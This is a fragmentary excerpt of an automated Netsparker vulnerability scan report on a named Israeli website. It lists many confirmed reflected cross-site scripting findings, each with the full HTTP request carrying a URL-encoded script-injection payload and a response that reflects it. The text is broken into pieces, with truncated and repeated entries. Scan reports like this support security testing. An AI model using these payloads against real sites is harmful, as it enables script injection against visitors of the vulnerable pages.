RequestGET /pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00013F)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:38 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 166Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/pitgam'"-->netsparker(0x00013F)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:01:43 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 182Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/style/style.css'"-->netsparker(0x000452)script>style>netsparker(0x00012E)script>style>
3.17. /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/sc..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0004E9)
RequestGET /page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E9)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:46 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/page/'"-->netsparker(0x0004E9)script>style>
RequestGET /about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00052F)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:11 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 173Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/'"-->netsparker(0x00052F)script>style>netsparker(0x0003B2) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 180Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/upload_image.asp?'"-->netsparker(0x0003B2)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:56:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 181Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/alon/archive.asp'"-->netsparker(0x00029F)script>style>
''''-->netsparker(0x000245)
0
3.24. /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0001CB)
RequestGET /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CB)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:47:56 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 173Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/tags/tags.asp'"-->netsparker(0x0001CB)script>style>netsparker(0x00040D) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:55 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 171Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/+ win +?'"-->netsparker(0x00040D)script>style>
3.26. /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x000127)
RequestGET /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000127)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:21 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 182Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/jAccordion/default.css'"-->netsparker(0x000127)script>style>
3.28. /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x00046E)
RequestGET /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00046E)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:02:57 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 172Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/reg/'"-->netsparker(0x00046E)script>style>
RequestGET /scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FD)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:07 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 168Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/scripts/'"-->netsparker(0x0000FD)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:33 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 186Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/search/default.asp'"-->netsparker(0x0004D2)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:37 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 169Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/kaftorim/'"-->netsparker(0x00057E)script>style>
alert(0x000642)
RequestPOST /ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000642)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/ask/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedHost: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAContent-Length: 37Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
38 / 146
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:07:54 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 186Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/reg/maillingUpdate.asp'"-->netsparker(0x000642)script>style>netsparker(0x0002B1)script>style>
3.39. /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/scri..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0000D7)
RequestGET /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000D7)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:43:52 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 163Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/'"-->netsparker(0x0000D7)script>style>
3.41. /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x00028A)
RequestGET /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00028A)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: privateDate: Tue, 20 May 2014 13:56:05 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETContent-Encoding: Vary: Accept-EncodingTransfer-Encoding: chunked
404;http://www.shalomlaam.co.il:80/site/contact/'"-->netsparker(0x00028A)script>style>
RequestGET /site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002DC)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:56:55 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 178Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/Presentation/'"-->netsparker(0x0002DC)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:09 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/'"-->netsparker(0x000106)script>style>netsparker(0x0003EB) HTTP/1.1Referer: http://www.shalomlaam.co.il/js/func_site.jsAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:35 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 177Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/getbanner.asp?'"-->netsparker(0x0003EB)script>style>
3.48. /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x000134)
RequestGET /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000134)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:28 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 177Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/index.html'"-->netsparker(0x000134)script>style>
3.50. /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001..
ParametersParameter Type Value
id GET 805
URI-BASED Full URL '"-->alert(0x000195)
RequestGET /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000195)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:46:57 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 174Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/answer.asp'"-->netsparker(0x000195)script>style>
3.52. /images/pagetop.asp CONFIRMEDhttp://www.shalomlaam.co.il/images/pagetop.asp?'"-->alert(0x0003EA)
ParametersParameter Type Value
Query Based Query String '"-->alert(0x0003EA)
RequestGET /images/pagetop.asp?'"-->netsparker(0x0003EA) HTTP/1.1Referer: http://www.shalomlaam.co.il/images/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:34 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 179Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/images/pagetop.asp?'"-->netsparker(0x0003EA)script>style>alert(0x000560)
46 / 146
RequestGET /about/search/default.asp?'"-->netsparker(0x000560) HTTP/1.1Referer: http://www.shalomlaam.co.il/about/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:04:25 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 185Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/default.asp?'"-->netsparker(0x000560)script>style>
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:00:49 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 165Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/news/'"-->netsparker(0x000400)script>style>netsparker(0x000160)script>style>
3.59. /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0000E8)
RequestGET /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E8)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:43:56 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 183Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/gallery/highslide/'"-->netsparker(0x0000E8)script>style>
3.61. /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x00011E)
RequestGET /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00011E)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 13:44:18 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 178Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/home/home_page.css'"-->netsparker(0x00011E)script>style>
3.63. /vod/vod.asp CONFIRMEDhttp://www.shalomlaam.co.il/vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..
ParametersParameter Type Value
id GET '"-->alert(0x00015D)
RequestGET /vod/vod.asp?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00015D)%3C/script%3E HTTP/1.1Referer: http://www.shalomlaam.co.il/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
Response';}
netsparker(0x00015D)_fix.mp4" type="video/mp4">-->
Your browser does not support the video tag.
3.65. /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3ECONFIRMEDhttp://www.shalomlaam.co.il/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%..
ParametersParameter Type Value
URI-BASED Full URL '"-->alert(0x0004E2)
RequestGET /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E2)%3C/script%3E HTTP/1.1Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Cache-Control: no-cacheAccept-Language: en-us,en;q=0.5Host: www.shalomlaam.co.ilCookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMAAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidate, max-age=0Date: Tue, 20 May 2014 14:03:44 GMTContent-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETVary: Accept-EncodingContent-Length: 170Pragma: no-cacheExpires: Tue, 01 Jan 1971 02:00:00 GMT
